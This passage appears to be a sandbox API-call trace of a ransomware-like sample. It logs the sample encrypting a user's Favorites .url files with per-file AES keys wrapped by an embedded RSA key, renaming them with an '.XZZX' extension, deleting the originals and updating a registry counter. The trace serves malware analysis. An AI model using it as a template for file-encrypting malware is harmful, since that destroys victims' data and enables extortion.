lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0046.887] WriteFile (in: hFile=0x56c, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x1a, lpOverlapped=0x0) returned 1 [0046.887] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa4 [0046.887] WriteFile (in: hFile=0x56c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0046.887] SetFilePointer (in: hFile=0x56c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa9 [0046.887] SetErrorMode (uMode=0x1) returned 0x1 [0046.887] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0046.887] OutputDebugStringW (lpOutputString="end") [0046.887] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0046.887] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0046.887] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3e41ee0) returned 1 [0046.888] CryptImportPublicKeyInfo (in: hCryptProv=0x3e41ee0, dwCertEncodingType=0x1, pInfo=0x3e408e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e40910*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e40918*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x3e27eb8) returned 1 [0046.888] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0046.888] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0046.888] CryptEncrypt (in: hKey=0x3e27eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0046.889] CryptEncrypt (in: hKey=0x3e27eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e41f68*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e41f68*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0046.889] WriteFile (in: hFile=0x56c, lpBuffer=0x3e41f68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e41f68*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0046.889] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0046.889] WriteFile (in: hFile=0x56c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0046.889] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0046.889] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0046.889] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x584) returned 0x0 [0046.890] RegQueryValueExW (in: hKey=0x584, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x48, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0046.890] RegCloseKey (hKey=0x584) returned 0x0 [0046.890] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x584) returned 0x0 [0046.890] RegSetValueExW (in: hKey=0x584, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x49, cbData=0x4 | out: lpData=0x42cdfec*=0x49) returned 0x0 [0046.890] RegCloseKey (hKey=0x584) returned 0x0 [0046.890] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.890] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0046.891] CloseHandle (hObject=0x56c) returned 1 [0046.891] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0046.892] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0046.892] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url")) returned 1 [0046.892] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url")) returned 0 Thread: id = 168 os_tid = 0x880 [0046.894] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0046.894] lstrcpyW (in: lpString1=0x417f460, lpString2="MSN Sports.url" | out: lpString1="MSN Sports.url") returned="MSN Sports.url" [0046.894] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0046.894] SetErrorMode (uMode=0x1) returned 0x1 [0046.894] lstrcpyW (in: lpString1=0x417f860, lpString2="MSN Sports.url" | out: lpString1="MSN Sports.url") returned="MSN Sports.url" [0046.894] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0xaed48d49, Data2=0xeb83, Data3=0x416a, Data4=([0]=0x86, [1]=0xdc, [2]=0xe3, [3]=0x8c, [4]=0x2f, [5]=0x8f, [6]=0x1b, [7]=0x87))) returned 0x0 [0046.894] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0046.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0046.894] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\94764F5B3C2DC73EAED48D494045AB86.XZZX") returned 94 [0046.894] StrStrW (lpFirst="MSN Sports.url", lpSrch="XZZX") returned 0x0 [0046.894] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url", dwFileAttributes=0x20) returned 1 [0046.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x578 [0046.895] ReadFile (in: hFile=0x578, lpBuffer=0x34e068, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x34e068*, lpNumberOfBytesRead=0x417e418*=0x85, lpOverlapped=0x0) returned 1 [0046.895] CloseHandle (hObject=0x578) returned 1 [0046.895] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0046.896] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0046.896] SetErrorMode (uMode=0x1) returned 0x1 [0046.896] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0046.896] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e41ff0) returned 1 [0046.898] CryptGenKey (in: hProv=0x3e41ff0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e27db8) returned 1 [0047.043] CryptExportKey (in: hKey=0x3e27db8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0047.043] CryptExportKey (in: hKey=0x3e27db8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0047.043] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0047.044] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0047.044] CryptDestroyKey (hKey=0x3e27db8) returned 1 [0047.044] CryptReleaseContext (hProv=0x3e41ff0, dwFlags=0x0) returned 1 [0047.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\94764F5B3C2DC73EAED48D494045AB86.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\94764f5b3c2dc73eaed48d494045ab86.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x578 [0047.044] WriteFile (in: hFile=0x578, lpBuffer=0x34e068*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x34e068*, lpNumberOfBytesWritten=0x417e438*=0x85, lpOverlapped=0x0) returned 1 [0047.045] SetFilePointer (in: hFile=0x578, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0047.045] WriteFile (in: hFile=0x578, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0047.045] SetFilePointer (in: hFile=0x578, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x8a [0047.045] WriteFile (in: hFile=0x578, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x1c, lpOverlapped=0x0) returned 1 [0047.045] SetFilePointer (in: hFile=0x578, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa6 [0047.045] WriteFile (in: hFile=0x578, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0047.045] SetFilePointer (in: hFile=0x578, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xab [0047.045] SetErrorMode (uMode=0x1) returned 0x1 [0047.046] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0047.046] OutputDebugStringW (lpOutputString="end") [0047.046] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0047.046] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0047.046] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e41ff0) returned 1 [0047.046] CryptImportPublicKeyInfo (in: hCryptProv=0x3e41ff0, dwCertEncodingType=0x1, pInfo=0x3e409b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e409e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e409e8*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x3e27ef8) returned 1 [0047.046] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0047.047] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0047.047] CryptEncrypt (in: hKey=0x3e27ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0047.047] CryptEncrypt (in: hKey=0x3e27ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e42078*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e42078*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0047.047] WriteFile (in: hFile=0x578, lpBuffer=0x3e42078*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e42078*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0047.047] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0047.047] WriteFile (in: hFile=0x578, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0047.047] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0047.047] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0047.048] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x588) returned 0x0 [0047.048] RegQueryValueExW (in: hKey=0x588, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x49, lpcbData=0x417dfdc*=0x4) returned 0x0 [0047.048] RegCloseKey (hKey=0x588) returned 0x0 [0047.048] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x588) returned 0x0 [0047.048] RegSetValueExW (in: hKey=0x588, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x4a, cbData=0x4 | out: lpData=0x417dfec*=0x4a) returned 0x0 [0047.048] RegCloseKey (hKey=0x588) returned 0x0 [0047.048] VirtualFree (lpAddress=0x3e90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.048] VirtualFree (lpAddress=0x3ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0047.048] CloseHandle (hObject=0x578) returned 1 [0047.049] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0047.049] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0047.050] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url")) returned 1 [0047.050] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url")) returned 0 Thread: id = 169 os_tid = 0x878 [0047.206] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0047.206] lstrcpyW (in: lpString1=0x417f460, lpString2="MSN.url" | out: lpString1="MSN.url") returned="MSN.url" [0047.206] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\" [0047.206] SetErrorMode (uMode=0x1) returned 0x1 [0047.206] lstrcpyW (in: lpString1=0x417f860, lpString2="MSN.url" | out: lpString1="MSN.url") returned="MSN.url" [0047.206] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x4af8fa2e, Data2=0x4cdc, Data3=0x4028, Data4=([0]=0xae, [1]=0x47, [2]=0x1, [3]=0x64, [4]=0x22, [5]=0x82, [6]=0xa2, [7]=0x2d))) returned 0x0 [0047.206] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0047.206] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0047.206] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\583CA788134302604AF8FA2E175AE6A8.XZZX") returned 94 [0047.206] StrStrW (lpFirst="MSN.url", lpSrch="XZZX") returned 0x0 [0047.206] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url", dwFileAttributes=0x20) returned 1 [0047.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0047.207] ReadFile (in: hFile=0x584, lpBuffer=0x34e188, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x34e188*, lpNumberOfBytesRead=0x417e418*=0x85, lpOverlapped=0x0) returned 1 [0047.207] CloseHandle (hObject=0x584) returned 1 [0047.207] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0047.208] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0047.208] SetErrorMode (uMode=0x1) returned 0x1 [0047.208] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0047.208] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e42100) returned 1 [0047.210] CryptGenKey (in: hProv=0x3e42100, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e27db8) returned 1 [0047.492] CryptExportKey (in: hKey=0x3e27db8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0047.493] CryptExportKey (in: hKey=0x3e27db8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x417e41c | out: pbData=0x3ea0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0047.493] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0047.494] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0047.494] CryptDestroyKey (hKey=0x3e27db8) returned 1 [0047.494] CryptReleaseContext (hProv=0x3e42100, dwFlags=0x0) returned 1 [0047.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\583CA788134302604AF8FA2E175AE6A8.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\583ca788134302604af8fa2e175ae6a8.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58c [0047.496] WriteFile (in: hFile=0x58c, lpBuffer=0x34e188*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x34e188*, lpNumberOfBytesWritten=0x417e438*=0x85, lpOverlapped=0x0) returned 1 [0047.497] SetFilePointer (in: hFile=0x58c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x85 [0047.497] WriteFile (in: hFile=0x58c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0047.497] SetFilePointer (in: hFile=0x58c, lDistanceToMove=0, 